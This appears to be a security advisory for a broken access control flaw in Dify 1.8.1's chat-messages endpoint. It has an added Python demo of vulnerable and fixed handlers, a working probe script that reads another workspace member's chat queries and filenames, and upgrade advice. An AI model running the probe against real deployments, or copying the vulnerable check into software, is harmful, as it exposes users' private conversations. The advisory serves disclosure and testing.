Dify Broken Access Control Vulnerability in Chat Message Endpoint Allows Unauthorized Message Reading

Vulnerability

A broken access control vulnerability (an insecure direct object reference) exists in Dify version 1.8.1 on the console endpoint 'GET /console/api/apps/<APP_ID>/chat-messages?conversation_id=<CONVERSATION_ID>&limit=10'. The request is authorized on membership in the workspace that owns the app, not on ownership of the conversation, so any workspace member who knows a conversation ID can read that conversation's messages. A regular (non-admin) user can therefore view the query text and attached filenames of an admin's chats, and potentially those of any other user in the workspace. This compromises the confidentiality of chat messages. The vulnerability has been patched in version 1.9.0.
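The following is an added illustration of the bug class, not Dify's code: a simplified message-listing handler that checks only the app's workspace and the conversation's app (the behaviour the advisory describes) beside one that also checks who owns the conversation. Names such as tenant_id, from_account_id and the role strings are assumptions chosen for the illustration.

```python
"""Added illustration of the bug class (not Dify's code): a handler that authorizes
on workspace (tenant) membership only, beside one that also checks conversation
ownership.  Field and role names are assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List


class NotFound(Exception):
    """Stands in for an HTTP 404 response."""


@dataclass
class Account:
    id: str
    tenant_id: str          # workspace the account belongs to
    role: str               # e.g. "admin" or "normal" (assumed role names)


@dataclass
class App:
    id: str
    tenant_id: str


@dataclass
class Conversation:
    id: str
    app_id: str
    from_account_id: str    # console user who started the chat (assumed field name)


@dataclass
class Message:
    conversation_id: str
    query: str
    file_names: List[str] = field(default_factory=list)


@dataclass
class Store:
    apps: Dict[str, App] = field(default_factory=dict)
    conversations: Dict[str, Conversation] = field(default_factory=dict)
    messages: List[Message] = field(default_factory=list)


def _load_conversation(store: Store, user: Account, app_id: str, conversation_id: str) -> Conversation:
    """Checks shared by both variants: the app is in the caller's workspace and the
    conversation belongs to that app.  Neither check looks at who owns the
    conversation, which is the gap."""
    app = store.apps.get(app_id)
    if app is None or app.tenant_id != user.tenant_id:
        raise NotFound("app")
    conv = store.conversations.get(conversation_id)
    if conv is None or conv.app_id != app.id:
        raise NotFound("conversation")
    return conv


def list_messages_vulnerable(store: Store, user: Account, app_id: str, conversation_id: str, limit: int = 10) -> List[Message]:
    """Any workspace member who knows the conversation ID gets the messages."""
    conv = _load_conversation(store, user, app_id, conversation_id)
    return [m for m in store.messages if m.conversation_id == conv.id][:limit]


def list_messages_fixed(store: Store, user: Account, app_id: str, conversation_id: str, limit: int = 10) -> List[Message]:
    """Object-level check added: the caller must own the conversation.  Answering
    404 rather than 403 avoids confirming that a guessed ID exists."""
    conv = _load_conversation(store, user, app_id, conversation_id)
    if conv.from_account_id != user.id:
        raise NotFound("conversation")
    return [m for m in store.messages if m.conversation_id == conv.id][:limit]


def demo() -> dict:
    """Constructed scenario: an admin's conversation requested by a normal member."""
    store = Store()
    store.apps["app-1"] = App("app-1", "ws-1")
    store.conversations["conv-admin"] = Conversation("conv-admin", "app-1", "acct-admin")
    store.messages.append(Message("conv-admin", "draft of the Q3 board deck", ["board-deck.pdf"]))
    admin = Account("acct-admin", "ws-1", "admin")
    normal = Account("acct-normal", "ws-1", "normal")

    result = {}
    result["vulnerable_leaks"] = [m.query for m in list_messages_vulnerable(store, normal, "app-1", "conv-admin")]
    try:
        list_messages_fixed(store, normal, "app-1", "conv-admin")
        result["fixed_denies"] = False
    except NotFound:
        result["fixed_denies"] = True
    result["owner_still_reads"] = [m.file_names for m in list_messages_fixed(store, admin, "app-1", "conv-admin")]
    return result


if __name__ == "__main__":
    print(demo())
```

If a deployment's policy is that admins may read other members' conversations, that exception belongs as an explicit role check in the fixed variant; the point is that the decision is made per conversation, not per workspace.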

Impact

A regular user who knows a conversation ID can read the chat messages and associated metadata (query text and filenames) of admin and other users in the same workspace. The endpoint does not itself reveal or enumerate conversation IDs, so an attacker must obtain them by other means, but once an ID is known no further privilege is required. The result is a direct breach of the confidentiality of other users' chat content.

Reproduction

The vulnerability can be reproduced by sending a GET request to the chat messages endpoint with a valid APP_ID and a conversation ID that belongs to another user (for example an admin). When the request carries a regular user's console bearer token, a vulnerable instance returns that conversation's messages instead of rejecting the request.
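The script below is an added reproduction helper, not part of the advisory: it issues the request described above with a regular user's console token and reports whether the other user's messages come back. The base URL, the token, and the response shape (a JSON object whose "data" list holds message objects with "query" and "message_files" fields) are assumptions to be adjusted against the instance under test.

```python
"""Added reproduction helper (not from the advisory).  Sends the advisory's GET
request with a *regular* member's console token and classifies the outcome.
Base URL, token and the response field names are assumptions."""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request


def build_request(base_url: str, app_id: str, conversation_id: str, token: str, limit: int = 10) -> urllib.request.Request:
    """Builds GET /console/api/apps/<APP_ID>/chat-messages?conversation_id=...&limit=..."""
    query = urllib.parse.urlencode({"conversation_id": conversation_id, "limit": limit})
    url = f"{base_url.rstrip('/')}/console/api/apps/{app_id}/chat-messages?{query}"
    return urllib.request.Request(
        url,
        headers={"Authorization": f"Bearer {token}", "Accept": "application/json"},
        method="GET",
    )


def classify(status: int, body) -> str:
    """'readable' if another user's messages came back, 'empty' if the list was empty,
    'denied' if the instance rejected the request, otherwise 'unknown'."""
    if status == 200 and isinstance(body, dict) and isinstance(body.get("data"), list):
        return "readable" if body["data"] else "empty"
    if status in (401, 403, 404):
        return "denied"
    return "unknown"


def summarize(body) -> list:
    """Extracts what the advisory says leaks: query text and attached file names.
    The "message_files" / "filename" keys are assumed names."""
    out = []
    for msg in body.get("data", []):
        files = [f.get("filename") for f in msg.get("message_files", [])]
        out.append({"query": msg.get("query"), "files": files})
    return out


def probe(base_url: str, app_id: str, conversation_id: str, token: str):
    """Performs the request; returns (verdict, http_status, parsed_body)."""
    req = build_request(base_url, app_id, conversation_id, token)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            status, body = resp.status, json.load(resp)
    except urllib.error.HTTPError as err:
        status = err.code
        try:
            body = json.load(err)      # HTTPError is file-like
        except ValueError:
            body = None
    return classify(status, body), status, body


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: probe.py BASE_URL APP_ID CONVERSATION_ID REGULAR_USER_TOKEN")
    verdict, status, body = probe(*sys.argv[1:])
    print(f"HTTP {status}: {verdict}")
    if verdict == "readable":
        for item in summarize(body):
            print(item)
```

Run it once with the regular user's token against a conversation the admin created: 'readable' confirms the 1.8.1 behaviour, 'denied' is what a patched instance should produce. Use only conversation IDs from accounts you control or are authorized to test.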

Remediation

Upgrade to Dify version 1.9.0 or later, where this vulnerability has been fixed. Until the upgrade is applied, limit workspace membership to trusted users, since any member who obtains a conversation ID can read that conversation.

Added: Sep 25, 2025, 2:23 PM
Updated: Sep 25, 2025, 4:43 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 4.6
remediation: 7.7
relevance: 0.6
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.